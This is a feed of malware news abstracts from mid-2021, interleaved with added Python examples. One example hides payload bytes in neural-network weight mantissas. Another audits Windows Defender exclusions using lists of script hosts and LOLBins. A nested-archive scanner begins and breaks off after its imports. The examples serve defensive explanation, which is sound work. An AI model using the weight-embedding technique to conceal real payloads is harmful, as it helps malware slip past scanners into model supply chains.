Malware dev infects own PC and data ends up on intel platform Full Text
Abstract
A malware developer unleashed their creation on their system to try out new features and the data ended up on a cybercrime intelligence platform, exposing a glimpse of the cybercriminal endeavor.BleepingComputer
August 16, 2021
New AdLoad Variant Bypasses Apple’s Security Defenses to Target macOS Systems Full Text
Abstract
A new wave of attacks involving a notorious macOS adware family has evolved to leverage around 150 unique samples in the wild in 2021 alone, some of which have slipped past Apple's on-device malware scanner and even signed by its own notarization service, highlighting the malicious software ongoing attempts to adapt and evade detection. "AdLoad," as the malware is known, is one of several widespread adware and bundleware loaders targeting macOS since at least 2017. It's capable of backdooring an affected system to download and install adware or potentially unwanted programs (PUPs), as well as amass and transmit information about victim machines. The new iteration "continues to impact Mac users who rely solely on Apple's built-in security control XProtect for malware detection," SentinelOne threat researcher Phil Stokes said in an analysis published last week. "As of today, however, XProtect arguably has around 11 different signatures for AdLoaThe Hacker News
August 14, 2021
Malicious Docker Images Used to Mine Monero Full Text
Abstract
A recently uncovered cryptomining scheme used malicious Docker images to hijack organizations’ computing resources to mine cryptocurrency, according to cybersecurity firm Aqua Security.Info Risk Today
August 13, 2021
New InfoStealer Malware Spread Via Russian Underground Forum Full Text
Abstract
Researchers uncovered a new info-stealer malware “Ficker” and is distributed via a Russian underground forum by threat actors as Malware-as-a-Service (MaaS) model to attack Windows users.GB Hackers
August 13, 2021
Updated AdLoad Malware Capable of Bypassing Apple’s Defenses Full Text
Abstract
SentinelOne warned against a new AdLoad malware variant that bypasses Apple's YARA signature-based XProtect built-in antivirus tech to infect macOS. Hundreds of unique samples of AdLoad adware were found circulating in the wild that remained undetected for almost ten months. Researchers emphasize t ... Read MoreCyware Alerts - Hacker News
August 13, 2021
eCh0raix Combo: Targeting Both QNAP and Synology Full Text
Abstract
Palo Alto disclosed that a new eCh0raix variant is now capable of encrypting both QNAP and Synology Network-Attached Storage (NAS) devices. Therefore, researchers recommend updating device firmware as the first step of defense. Also, it is recommended to create complex passwords and limit connectio ... Read MoreCyware Alerts - Hacker News
August 13, 2021
Chaos: Ransomware or Wiper? Full Text
Abstract
A new malware named Chaos has been discovered on an underground forum claiming to be a ransomware but, an analysis by researchers suggests it is a wiper under development. It has been in development since June and could become a serious and dangerous threat for organizations in near future.Cyware Alerts - Hacker News
August 12, 2021
Signed MSI files, Raccoon and Amadey are used for installing ServHelper RAT Full Text
Abstract
Although ServHelper has existed since at least early 2019, we detected the use of other malware families to install it. The installation comes as a GoLang dropper, .NET dropper, or PowerShell script.Cisco Talos
August 12, 2021
July 2021’s Most Wanted Malware: Snake Keylogger Enters Top 10 for First Time - Check Point Software Full Text
Abstract
Check Point Research reports that Trickbot is the most prevalent malware for the third month running, while Snake Keylogger enters the index for the first time taking second place.Check Point Research
August 12, 2021
AdLoad Malware 2021 Samples Skate Past Apple XProtect Full Text
Abstract
A crush of new attacks using the well-known adware involves at least 150 updated samples, many of which aren’t recognized by Apple’s built-in security controls.Threatpost
August 12, 2021
Experts Shed Light On New Russian Malware-as-a-Service Written in Rust Full Text
Abstract
A nascent information-stealing malware sold and distributed on underground Russian underground forums has been written in Rust, signalling a new trend where threat actors are increasingly adopting exotic programming languages to bypass security protections, evade analysis, and hamper reverse engineering efforts. Dubbed " Ficker Stealer ," it's notable for being propagated via Trojanized web links and compromised websites, luring in victims to scam landing pages purportedly offering free downloads of legitimate paid services like Spotify Music, YouTube Premium, and other Microsoft Store applications. "Ficker is sold and distributed as Malware-as-a-Service (MaaS), via underground Russian online forums," BlackBerry's research and intelligence team said in a report published today. "Its creator, whose alias is @ficker, offers several paid packages, with different levels of subscription fees to use their malicious program." First seen in the wiThe Hacker News
August 11, 2021
New AdLoad malware variant slips through Apple’s XProtect defenses Full Text
Abstract
A new AdLoad malware variant is slipping through Apple's YARA signature-based XProtect built-in antivirus tech to infect Macs.BleepingComputer
August 09, 2021
FlyTrap malware hijacks thousands of Facebook accounts Full Text
Abstract
A new Android threat that researchers call FlyTrap has been hijacking Facebook accounts of users in more than 140 countries by stealing session cookies.BleepingComputer
August 09, 2021
Beware! New Android Malware Hacks Thousands of Facebook Accounts Full Text
Abstract
A new Android trojan has been found to compromise Facebook accounts of over 10,000 users in at least 144 countries since March 2021 via fraudulent apps distributed through Google Play Store and other third-party app marketplaces. Dubbed " FlyTrap ," the previously undocumented malware is believed to be part of a family of trojans that employ social engineering tricks to breach Facebook accounts as part of a session hijacking campaign orchestrated by malicious actors operating out of Vietnam, according to a report published by Zimperium's zLabs today and shared with The Hacker News. Although the offending nine applications have since been pulled from Google Play, they continue to be available in third-party app stores, "highlighting the risk of sideloaded applications to mobile endpoints and user data," Zimperium malware researcher Aazim Yaswant said. The list of apps is as follows - GG Voucher (com.luxcarad.cardid) Vote European Football (com.gardenguThe Hacker News
August 09, 2021
Synology warns of malware infecting NAS devices with ransomware Full Text
Abstract
Taiwan-based NAS maker Synology has warned customers that the StealthWorker botnet is targeting their network-attached storage devices in ongoing brute-force attacks.BleepingComputer
August 8, 2021
FatalRAT: Another Trojan Exploiting Telegram Full Text
Abstract
Telegram channels have become quite the hot seat for threat actors. Lately, a new Remote Access Trojan (RAT) has entered the landscape, propagating via Telegram channels.Cyware Alerts - Hacker News
August 5, 2021
Black Hat: Charming Kitten Leaves More Paw Prints Full Text
Abstract
IBM X-Force detailed the custom-made “LittleLooter” data stealer and 4+ hours of ITG18 operator training videos revealed by an opsec goof.Threatpost
August 5, 2021
Examining Unique Magento Backdoors Full Text
Abstract
These backdoors are intentionally hidden from public view, rendering any remote or external scanners futile, and the dynamic nature of these backdoors makes signature-based detection less reliable.Sucuri
August 04, 2021
Several Malware Families Targeting IIS Web Servers With Malicious Modules Full Text
Abstract
A systematic analysis of attacks against Microsoft's Internet Information Services (IIS) servers has revealed as many as 14 malware families, 10 of them newly documented, indicating that the Windows-based web server software has been a hotbed for natively developed malware for close to eight years. The findings were presented today by ESET malware researcher Zuzana Hromcova at the Black Hat USA security conference . "The various kinds of native IIS malware identified are server-side malware and the two things it can do best is, first, see and intercept all communications to the server, and second, affect how the requests are processed," Hromcova said in an interview with The Hacker News. "Their motivations range from cybercrime to espionage, and a technique called SEO fraud." IIS is an extensible web server software developed by Microsoft, enabling developers to take advantage of its modular architecture and use additional IIS modules to expand onThe Hacker News
August 4, 2021
Python Packages Stealing Discord Tokens and Much More Full Text
Abstract
Eight PyPI libraries were found to contain malicious code and have been removed from the registry. While two of the eight enabled an attacker to remotely run commands on the target's device, the other six were stealers.Cyware Alerts - Hacker News
August 3, 2021
New Raccoon Stealer-as-a-Service Aims to Steal Cookies, Cryptocurrencies Full Text
Abstract
In a new campaign tracked by Sophos researchers, the malware was spread not through spam emails but, instead, droppers disguised as installers for cracked and pirated software.ZDNet
August 2, 2021
Six Ways Malicious Linux Shell Scripts Evade Defenses Full Text
Abstract
Cybercriminals are using Linux shell scripts in a range of evasion techniques. Security analysts published a report describing six ways attackers use malicious shell scripts to hide their activity. They strongly recommend the use of EDR systems for monitoring suspicious events, processes, a ...Cyware Alerts - Hacker News
August 02, 2021
Solarmarker InfoStealer Malware Once Again Making its Way Into the Wild Full Text
Abstract
Healthcare and education sectors are the frequent targets of a new surge in credential harvesting activity from what's a "highly modular" .NET-based information stealer and keylogger, charting the course for the threat actor's continued evolution while simultaneously remaining under the radar. Dubbed " Solarmarker ," the malware campaign is believed to be active since September 2020, with telemetry data pointing to malicious actions as early as April 2020, according to Cisco Talos. "At its core, the Solarmarker campaign appears to be conducted by a fairly sophisticated actor largely focused on credential and residual information theft," Talos researchers Andrew Windsor and Chris Neal said in a technical write-up published last week. Infections consist of multiple moving parts, chief among them being a .NET assembly module that serves as a system profiler and staging ground on the victim host for command-and-control (C2) communications and furThe Hacker News
July 31, 2021
Android Banking Trojan Vultur uses screen recording for credentials stealing Full Text
Abstract
ThreatFabric researchers discovered a new strain of Android banking Trojan, tracked as Vultur, that uses screen recording and keylogging to capture login credentials...Security Affairs
July 31, 2021
Microsoft: This Windows and Linux malware does everything it can to stay on your network Full Text
Abstract
Microsoft has continued its analysis of the LemonDuck malware, known for installing crypto-miners in enterprise environments. It makes a strong case for why it is worth removing it from your network.ZDNet
July 30, 2021
LockBit 2.0 Abuses Windows Domains to Propagate Full Text
Abstract
A new LockBit variant has been discovered that automates encryption across a whole Windows domain. It has multiple advanced features and now abuses Active Directory group policy to propagate. The new tactics indicate that the LockBit developers are well versed in the Windows OS and are leaving no ston ...Cyware Alerts - Hacker News
July 30, 2021
Experts Uncover Several C&C Servers Linked to WellMess Malware Full Text
Abstract
Cybersecurity researchers on Friday unmasked new command-and-control (C2) infrastructure belonging to the Russian threat actor tracked as APT29, aka Cozy Bear, that has been spotted actively serving WellMess malware as part of an ongoing attack campaign. More than 30 C2 servers operated by the Russian foreign intelligence have been uncovered, Microsoft-owned cybersecurity subsidiary RiskIQ said in a report shared with The Hacker News. APT29, the moniker assigned to government operatives working for Russia's Foreign Intelligence Service (SVR), is believed to have been the mastermind behind the massive SolarWinds supply chain attack that came to light late last year, with the U.K. and U.S. governments formally pinning the intrusions on Russia earlier this April. The activity is being tracked by the cybersecurity community under various codenames, including UNC2452 (FireEye), Nobelium (Microsoft), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), andThe Hacker News
July 30, 2021
PyPI packages caught stealing credit card numbers, Discord tokens Full Text
Abstract
The Python Package Index (PyPI) registry has removed several Python packages this week aimed at stealing users' credit card numbers, Discord tokens, and granting arbitrary code execution capabilities to attackers. These malicious packages were downloaded over 30,000 times according to the researchers who caught them.BleepingComputer
July 30, 2021
Several Malicious Typosquatted Python Libraries Found On PyPI Repository Full Text
Abstract
As many as eight Python packages that were downloaded more than 30,000 times have been removed from the PyPI portal for containing malicious code, once again highlighting how software package repositories are evolving into a popular target for supply chain attacks. "Lack of moderation and automated security controls in public software repositories allow even inexperienced attackers to use them as a platform to spread malware, whether through typosquatting, dependency confusion, or simple social engineering attacks," JFrog researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe said Thursday. PyPI, short for Python Package Index, is the official third-party software repository for Python, with package manager utilities like pip relying on it as the default source for packages and their dependencies. The Python packages in question, which were found to be obfuscated using Base64 encoding, are listed below - pytagora (uploaded by leonora123) pytagora2 (uplThe Hacker News
July 30, 2021
A New Wiper Malware Was Behind Recent Cyberattack On Iranian Train System Full Text
Abstract
A cyber attack that derailed websites of Iran's transport ministry and its national railway system earlier this month, causing widespread disruptions in train services, was the result of a never-before-seen reusable wiper malware called "Meteor." The campaign — dubbed " MeteorExpress " — has not been linked to any previously identified threat group or to additional attacks, making it the first incident involving the deployment of this malware, according to researchers from Iranian antivirus firm Amn Pardaz and SentinelOne. Meteor is believed to have been in the works over the past three years. "Despite a lack of specific indicators of compromise, we were able to recover most of the attack components," SentinelOne's Principal Threat Researcher, Juan Andres Guerrero-Saade, noted. "Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker," adding the offensive is "designed tThe Hacker News
July 30, 2021
Researchers Discover New Solarmarker Malware Activity Focused on Credential and Information Theft Full Text
Abstract
The report by Cisco Talos added that Microsoft researchers believe the Solarmarker campaign is using SEO poisoning in order to make their dropper files highly visible in search engine results.ZDNet
July 29, 2021
Malware Hidden Inside Neural Network Models has Over 90% Efficacy Full Text
Abstract
A new research attack method demonstrated that replacing up to 50% of the neurons in the AlexNet model with malware bytes can go undetected by security tools, as the model's accuracy remained above 93.1%. Popular technologies such as machine learning and neural networks are still at their nascent stage, ...Cyware Alerts - Hacker News
July 29, 2021
New destructive Meteor wiper malware used in Iranian railway attack Full Text
Abstract
A new file wiping malware called Meteor was discovered used in the recent attacks against Iran's railway system.BleepingComputer
July 29, 2021
Six Malicious Linux Shell Scripts Used to Evade Defenses and How to Stop Them Full Text
Abstract
Uptycs Threat Research outline how malicious Linux shell scripts are used to cloak attacks and how defenders can detect and mitigate against them.Threatpost
July 29, 2021
New Android Malware Uses VNC to Spy and Steal Passwords from Victims Full Text
Abstract
A previously undocumented Android-based remote access trojan (RAT) has been found to use screen recording features to steal sensitive information on the device, including banking credentials, and open the door for on-device fraud. Dubbed "Vultur" due to its use of Virtual Network Computing (VNC)'s remote screen-sharing technology to gain full visibility on targeted users, the mobile malware was distributed via the official Google Play Store and masqueraded as an app named "Protection Guard," attracting over 5,000 installations. Banking and crypto-wallet apps from entities located in Italy, Australia, and Spain were the primary targets. "For the first time we are seeing an Android banking trojan that has screen recording and keylogging as the main strategy to harvest login credentials in an automated and scalable way," researchers from ThreatFabric said in a write-up shared with The Hacker News. "The actors chose to steer away from the commoThe Hacker News
July 29, 2021
New Vultur Android Malware Records Smartphones via VNC to Steal Passwords Full Text
Abstract
Researchers have discovered a new Android malware that uses the VNC technology to record and broadcast a victim’s smartphone activity, allowing attackers to collect keyboard presses and app passwords.The Record
July 28, 2021
UBEL is the New Oscorp — Android Credential Stealing Malware Active in the Wild Full Text
Abstract
An Android malware that was observed abusing accessibility services in the device to hijack user credentials from European banking applications has morphed into an entirely new botnet as part of a renewed campaign that began in May 2021. Italy's CERT-AGID, in late January, disclosed details about Oscorp , a mobile malware developed to attack multiple financial targets with the goal of stealing funds from unsuspecting victims. Its features include the ability to intercept SMS messages, make phone calls, and perform overlay attacks against more than 150 mobile applications by using lookalike login screens to siphon valuable data. The malware was distributed through malicious SMS messages, with the attacks often conducted in real time by posing as bank operators to dupe targets over the phone and surreptitiously gain access to the infected device via the WebRTC protocol and ultimately conduct unauthorized bank transfers. While no new activities were reported since then, it appeThe Hacker News
July 28, 2021
Beware: Fake Windows 11 Installers Spreading Adware Full Text
Abstract
Kaspersky discovered a significant rise in malicious links for bogus Windows 11 installers. The primary purpose of the executable is to download different types of malicious software on the device. Therefore, it is recommended that users avoid downloading installations from third-party websites.Cyware Alerts - Hacker News
July 28, 2021
Increasing Use of ‘Exotic’ Programming Languages for Malware Development Full Text
Abstract
Cybercriminals are increasingly using 'exotic' programming languages such as Go, Rust, Nim, and Dlang to develop malware. A recently published report suggests that the use of these languages is becoming a trend for new malware, partly because existing security tooling has less coverage for them. To identify and prevent such threats, security researchers suggest ...Cyware Alerts - Hacker News
July 28, 2021
BlackMatter ransomware targets companies with revenue of $100 million and more Full Text
Abstract
A new ransomware gang launched into operation this week, claiming to combine the best features of the now-defunct Darkside and REvil ransomware groups, Recorded Future analysts have discovered.The Record
July 27, 2021
Wiper Malware Riding the 2021 Tokyo Olympic Games Full Text
Abstract
In the opening hours of the Tokyo Olympic Games, a wiper malware surfaced that is reminiscent of Olympic Destroyer, the destructive malware that targeted the Pyeongchang Winter Games.Fortinet
July 27, 2021
Hackers Turning to ‘Exotic’ Programming Languages for Malware Development Full Text
Abstract
Threat actors are increasingly shifting to "exotic" programming languages such as Go, Rust, Nim, and Dlang that can better circumvent conventional security protections, evade analysis, and hamper reverse engineering efforts. "Malware authors are known for their ability to adapt and modify their skills and behaviors to take advantage of newer technologies," said Eric Milam, Vice President of threat research at BlackBerry. "That tactic has multiple benefits from the development cycle and inherent lack of coverage from protective products." On the one hand, languages like Rust are more secure as they offer guarantees like memory-safe programming , but they can also be a double-edged sword when malware engineers abuse the same features designed to offer increased safeguards to their advantage, thereby making malware less susceptible to exploitation and thwarting attempts to activate a kill-switch and render it powerless. Noting that binaries written iThe Hacker News
July 27, 2021
Scammers are using fake Windows 11 installers to spread malware Full Text
Abstract
Security firm Kaspersky has warned that crooks were exploiting people overeager to get their hands on the Microsoft operating system update, due for fall release, with fake installers.Cyberscoop
July 26, 2021
Microsoft Warns of LemonDuck Malware Targeting Windows and Linux Systems Full Text
Abstract
An infamous cross-platform crypto-mining malware has continued to refine and improve upon its techniques to strike both Windows and Linux operating systems by setting its sights on older vulnerabilities, while simultaneously latching on to a variety of spreading mechanisms to maximize the effectiveness of its campaigns. "LemonDuck, an actively updated and robust malware that's primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations," Microsoft said in a technical write-up published last week. "Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity." The malware is notorious for its ability to propagate rapidly across an infected network to facilitate information theft anThe Hacker News
July 26, 2021
Hiding Malware inside a model of a neural network Full Text
Abstract
Researchers demonstrated how to hide malware inside an image classifier within a neural network in order to bypass the defense solutions. Researchers Zhi Wang, Chaoge Liu, and Xiang Cui presented a technique to deliver malware through neural network...Security Affairs
July 25, 2021
XCSSET MacOS malware targets Telegram, Google Chrome data and more Full Text
Abstract
XCSSET macOS malware continues to evolve and is now able to steal login information from multiple apps, including Telegram and Google Chrome. Security researchers from Trend Micro continue to monitor the evolution of the XCSSET macOS malware, new variants...Security Affairs
July 23, 2021
Fake Windows 11 installers now used to infect you with malware Full Text
Abstract
Scammers are already taking advantage of the hype surrounding Microsoft's next Windows release to push fake Windows 11 installers riddled with malware, adware, and other malicious tools.BleepingComputer
July 23, 2021
MacOS malware steals Telegram accounts, Google Chrome data Full Text
Abstract
Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts.BleepingComputer
July 23, 2021
Nasty macOS Malware XCSSET Now Targets Google Chrome, Telegram Software Full Text
Abstract
A malware known for targeting macOS operating system has been updated once again to add more features to its toolset that allows it to amass and exfiltrate sensitive data stored in a variety of apps, including apps such as Google Chrome and Telegram, as part of further "refinements in its tactics." XCSSET was uncovered in August 2020, when it was found targeting Mac developers using an unusual means of distribution that involved injecting a malicious payload into Xcode IDE projects that's executed at the time of building project files in Xcode. The malware comes with numerous capabilities, such as reading and dumping Safari cookies, injecting malicious JavaScript code into various websites, stealing information from applications, such as Notes, WeChat, Skype, Telegram, and encrypting user files. Earlier this April, XCSSET received an upgrade that enabled the malware authors to target macOS 11 Big Sur as well as Macs running on M1 chipset by circumventing new secuThe Hacker News
July 23, 2021
Researchers Successfully Hide Malware Inside an AI Neural Network Full Text
Abstract
According to the study by Chinese researchers, malware can be embedded directly into the artificial neurons that make up machine learning models in a way that keeps them from being detected.Vice
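The three items above (July 23, July 26 and July 29) describe the same result: bytes written into the parameters of a trained model change its output so little that accuracy survives, while nothing in the file looks like an executable to a scanner. The mechanism is easy to see on a single layer. The following is an added example, not the researchers' code: it overwrites the least significant mantissa byte of consecutive IEEE-754 single-precision weights with payload bytes (8 of the 23 mantissa bits, so each weight moves by at most about 3e-5 relative), then reads the bytes back. The weights are generated with a seeded Gaussian as a stand-in for a real layer, and the payload is a harmless marker string; both are constructed for this example.

```python
import random
import struct
from typing import List, Sequence


def make_weights(n: int, seed: int = 7) -> List[float]:
    """Stand-in for one layer of a trained model: n Gaussian weights.
    Constructed data so the example runs offline; sigma 0.05 keeps every
    weight far from the subnormal range, where the relative bound below
    would not hold."""
    rng = random.Random(seed)
    return [rng.gauss(0.0, 0.05) for _ in range(n)]


def embed_payload(weights: Sequence[float], payload: bytes) -> List[float]:
    """Hide `payload` in the low-order mantissa byte of consecutive float32
    weights, preceded by a 2-byte big-endian length so it can be read back."""
    data = len(payload).to_bytes(2, "big") + payload
    if len(data) > len(weights):
        raise ValueError("not enough weights to carry the payload")
    out = list(weights)
    for i, b in enumerate(data):
        raw = bytearray(struct.pack("<f", out[i]))   # float32, little-endian
        raw[0] = b                                   # byte 0 = low 8 mantissa bits
        out[i] = struct.unpack("<f", bytes(raw))[0]  # sign/exponent untouched
    return out


def extract_payload(weights: Sequence[float]) -> bytes:
    """Inverse of embed_payload: collect the low byte of every weight and
    use the length prefix to cut the payload out."""
    low = bytes(struct.pack("<f", w)[0] for w in weights)
    n = int.from_bytes(low[:2], "big")
    return low[2:2 + n]


def max_relative_change(original: Sequence[float], modified: Sequence[float]) -> float:
    """Largest |delta|/|w| introduced by the embedding; for normal float32
    values this is bounded by 255 * 2**-23, roughly 3e-5."""
    return max((abs(a - b) / abs(a) for a, b in zip(original, modified) if a != 0.0),
               default=0.0)


if __name__ == "__main__":
    layer = make_weights(4096)
    marker = b"constructed marker payload, not real malware"
    stego = embed_payload(layer, marker)
    print("recovered:", extract_payload(stego))
    print("max relative weight change: %.2e" % max_relative_change(layer, stego))
```

The weights still parse as a perfectly ordinary float array, and the low mantissa byte of a trained weight is already close to uniformly distributed, so neither a file-type check nor a byte-entropy heuristic separates a carrier model from a clean one. The practical control is provenance rather than content inspection: pin models by cryptographic hash, load only artifacts whose signature verifies, and treat a model file as code for supply-chain purposes.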
July 22, 2021
Joker Malware Continues to Go Strong Against Android Users Full Text
Abstract
Zscaler’s ThreatLabZ research team recently observed a new Joker malware variant that was distributed via 11 different apps on Google Play Store.Cyware Alerts - Hacker News
July 21, 2021
CISA warns of hacked Pulse Secure devices loaded with malware in disguise Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert today about more than a dozen malware samples found on exploited Pulse Secure devices that are largely undetected by antivirus products.BleepingComputer
July 21, 2021
NPM Package Steals Passwords via Chrome’s Account-Recovery Tool Full Text
Abstract
In another vast software supply-chain attack, the password-stealer is filching credentials from Chrome on Windows systems.Threatpost
July 21, 2021
Malicious NPM Package Caught Stealing Users’ Saved Passwords From Browsers Full Text
Abstract
A software package available from the official NPM repository has been revealed to be actually a front for a tool that's designed to steal saved passwords from the Chrome web browser. The package in question, named " nodejs_net_server " and downloaded over 1,283 times since February 2019, was last updated seven months ago (version 1.1.2), with its corresponding repository leading to non-existent locations hosted on GitHub. "It isn't malicious by itself, but it can be when put into the malicious use context," ReversingLabs researcher Karlo Zanki said in an analysis shared with The Hacker News. "For instance, this package uses it to perform malicious password stealing and credential exfiltration. Even though this off-the-shelf password recovery tool comes with a graphical user interface, malware authors like to use it as it can also be run from the command line." While the first version of the package was published just to test the process ofThe Hacker News
July 21, 2021
NPM package steals Chrome passwords on Windows via recovery tool Full Text
Abstract
New npm malware has been caught stealing credentials from the Google Chrome web browser by using legitimate password recovery tools on Windows systems. Additionally, this malware listens for incoming connections from the attacker's C2 server and provides advanced capabilities, including screen and camera access.BleepingComputer
July 21, 2021
Joker Billing Fraud Malware Apps with 30,000 Downloads Found in Google Play Store Full Text
Abstract
The Joker malware family is a well-known threat that focuses on compromising Android devices. It's designed to spy on its victims, steal information, harvest contact lists, and monitor SMS messaging.ZDNet
July 21, 2021
XLoader malware steals logins from macOS and Windows systems Full Text
Abstract
A highly popular malware for stealing information from Windows systems has been modified into a new strain called XLoader, which can also target macOS systems.BleepingComputer
July 21, 2021
XLoader Windows InfoStealer Malware Now Upgraded to Attack macOS Systems Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed details of an evolving malware that has now been upgraded to steal sensitive information from Apple's macOS operating system. The malware, dubbed "XLoader," is a successor to another well-known Windows-based info stealer called Formbook that's known to vacuum credentials from various web browsers, collect screenshots, log keystrokes, and download and execute files from attacker-controlled domains. "For as low as $49 on the Darknet, hackers can buy licenses for the new malware, enabling capabilities to harvest log-in credentials, collect screenshots, log keystrokes, and execute malicious files," cybersecurity firm Check Point said in a report shared with The Hacker News. Distributed via spoofed emails containing malicious Microsoft Office documents, XLoader is estimated to have infected victims across 69 countries between December 1, 2020, and June 1, 2021, with 53% of the infections reported in theThe Hacker News
July 21, 2021
Shlayer Malware: Continued Use of Flash Updates Full Text
Abstract
Recent Shlayer malvertising campaigns have gone back to using fake Flash updates and social engineering tactics to trick victims into manually installing the malware and compromising their systems.Crowdstrike
July 20, 2021
This New Malware Hides Itself Among Windows Defender Exclusions to Evade Detection Full Text
Abstract
Cybersecurity researchers on Tuesday lifted the lid on a previously undocumented malware strain dubbed " MosaicLoader " that singles out individuals searching for cracked software as part of a global campaign. "The attackers behind MosaicLoader created a piece of malware that can deliver any payload on the system, making it potentially profitable as a delivery service," Bitdefender researchers said in a report shared with The Hacker News. "The malware arrives on target systems by posing as cracked installers. It downloads a malware sprayer that obtains a list of URLs from the C2 server and downloads the payloads from the received links." The malware has been so named because of its sophisticated internal structure that's orchestrated to prevent reverse-engineering and evade analysis. Attacks involving MosaicLoader rely on a well-established tactic for malware delivery called search engine optimization (SEO) poisoning, wherein cybercriminals purcThe Hacker News
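A loader that parks itself in a Windows Defender exclusion is invisible to the scanner for as long as the exclusion stands, so the check a defender wants is an audit of the exclusion list itself. The following is an added example, not Bitdefender's or MosaicLoader's code: it parses an export of the `HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions` registry key (as produced by `reg export` in the usual `.reg` format) and flags exclusions that are too broad to be legitimate, such as a whole drive, anything under a user profile or temp directory, wildcards, and executable file types. The `SAMPLE_REG_EXPORT` text is constructed for this example and the risk rules are this example's own heuristics, not a vendor baseline.

```python
import re
from typing import Dict, List, Tuple

# Constructed .reg export for the example. Real exports use the same
# escaping: backslashes in value names are doubled, DWORD 0 per exclusion.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\Program Files\\VendorApp\\service.exe"=dword:00000000
"C:\\Users\\alice\\AppData\\Local\\Temp"=dword:00000000
"C:\\"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
".exe"=dword:00000000
".log"=dword:00000000
'''

_SECTION = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=')
_EXCL_MARKER = "\\Windows Defender\\Exclusions\\"

# Heuristics for this example: an exclusion matching any of these is
# broad enough that malware could stage itself inside it.
BROAD_PATH_RULES = [
    (re.compile(r"^[A-Za-z]:\\?$"), "entire drive excluded"),
    (re.compile(r"\\Users\\", re.I), "user-profile location, writable by the user"),
    (re.compile(r"\\(Temp|AppData|ProgramData|Downloads|Public)(\\|$)", re.I),
     "user- or world-writable staging directory"),
    (re.compile(r"[*?]"), "wildcard exclusion"),
]
EXEC_EXTENSIONS = {".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".scr", ".msi", ".hta"}
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe")


def parse_exclusions(reg_text: str) -> Dict[str, List[str]]:
    """Return {"Paths": [...], "Extensions": [...], "Processes": [...]}
    from a .reg export of the Exclusions key (missing subkeys are absent)."""
    result: Dict[str, List[str]] = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        section = _SECTION.match(line)
        if section:
            key = section.group(1)
            idx = key.find(_EXCL_MARKER)
            current = key[idx + len(_EXCL_MARKER):] if idx != -1 else None
            if current:
                result.setdefault(current, [])
            continue
        if current is None:
            continue
        value = _VALUE.match(line)
        if value:   # undo .reg escaping of the value name
            result[current].append(value.group(1).replace('\\\\', '\\').replace('\\"', '"'))
    return result


def assess(exclusions: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """Apply the heuristics; each finding is (subkey, exclusion, reason)."""
    findings: List[Tuple[str, str, str]] = []
    for path in exclusions.get("Paths", []):
        for rule, reason in BROAD_PATH_RULES:
            if rule.search(path):
                findings.append(("Paths", path, reason))
                break
    for ext in exclusions.get("Extensions", []):
        if ext.lower() in EXEC_EXTENSIONS:
            findings.append(("Extensions", ext, "executable file type excluded from scanning"))
    for proc in exclusions.get("Processes", []):
        if proc.lower().endswith(SCRIPT_HOSTS):
            findings.append(("Processes", proc, "script host or LOLBin excluded"))
    return findings


if __name__ == "__main__":
    for subkey, item, reason in assess(parse_exclusions(SAMPLE_REG_EXPORT)):
        print("%-10s %-45s %s" % (subkey, item, reason))
```

On a live host the same lists are available without an export through `Get-MpPreference` (the `ExclusionPath`, `ExclusionExtension` and `ExclusionProcess` properties), and changes to the exclusion key are worth alerting on in their own right: a fresh exclusion appearing moments before an unsigned binary lands inside it is the sequence this loader relies on.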
July 20, 2021
New MosaicLoader malware targets software pirates via online ads Full Text
Abstract
An ongoing worldwide campaign is pushing new malware dubbed MosaicLoader advertising camouflaged as cracked software via search engine results to infect wannabe software pirates' systems.BleepingComputer
July 19, 2021
Israeli Spyware Maker Is in Spotlight Amid Reports of Wide Abuses Full Text
Abstract
Data leaked to a consortium of news organizations suggests that several countries use Pegasus, a powerful cyberespionage tool, to spy on rights activists, dissidents and journalists.New York Times
July 18, 2021
New Leak Reveals Abuse of Pegasus Spyware to Target Journalists Globally Full Text
Abstract
A sweeping probe into a data leak of more than 50,000 phone numbers has revealed an extensive misuse of Israeli company NSO Group's Pegasus "military-grade spyware" to facilitate human rights violations by surveilling heads of state, activists, journalists, and lawyers around the world. Dubbed the " Pegasus Project ," the investigation is a collaboration by more than 80 journalists from a consortium of 17 media organizations in 10 countries coordinated by Forbidden Stories, a Paris-based media non-profit, along with the technical support of Amnesty International. "The Pegasus Project lays bare how NSO's spyware is a weapon of choice for repressive governments seeking to silence journalists, attack activists and crush dissent, placing countless lives in peril," Amnesty International's Secretary-General, Agnès Callamard, said. "These revelations blow apart any claims by NSO that such attacks are rare and down to rogue use of their teThe Hacker News
July 17, 2021
BazarBackdoor Uses New Obfuscation Tricks to Challenge Security Full Text
Abstract
A new phishing campaign is delivering the BazarBackdoor malware and using a multi-compression method (archives nested inside archives) to pass the malware off as an image file. This tricks Secure Email Gateways (SEGs) into classifying the malicious attachment as clean. This makes it a worrisome threat that requires continuou ...Cyware Alerts - Hacker News
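The evasion above works because a gateway that inspects one layer of compression, or that trusts the inner file's extension, never sees the executable. The following is an added example, not the campaign's tooling or any vendor's SEG logic: it builds a nested zip-in-zip attachment in memory whose innermost file is named `invoice.png` but starts with the `MZ` signature of a Windows executable (a constructed stub, not a real binary), then walks the attachment recursively, identifying each member by its leading bytes rather than its name and reporting nesting, executables, and name/content mismatches. The depth and size limits guard against decompression bombs while unpacking.

```python
import io
import os
import zipfile
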